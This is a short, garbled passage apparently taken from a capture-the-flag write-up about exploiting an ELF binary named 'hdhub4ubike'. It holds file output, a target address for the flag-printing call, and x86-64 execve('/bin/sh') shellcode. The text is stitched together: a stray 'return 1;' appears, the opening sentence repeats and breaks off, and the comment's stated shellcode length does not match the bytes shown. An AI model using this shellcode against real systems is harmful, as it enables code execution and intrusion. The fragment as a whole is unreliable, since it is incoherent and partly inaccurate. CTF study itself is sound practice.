The goal is to obtain the flag without knowing the correct key. 2.1 File information $ file hdhub4ubike hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...
BIN = "./hdhub4ubike" TARGET_ADDR = 0x004011a6 # address of the "puts" call that prints the flag hdhub4ubike
return 1;
# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall ) The goal is to obtain the flag without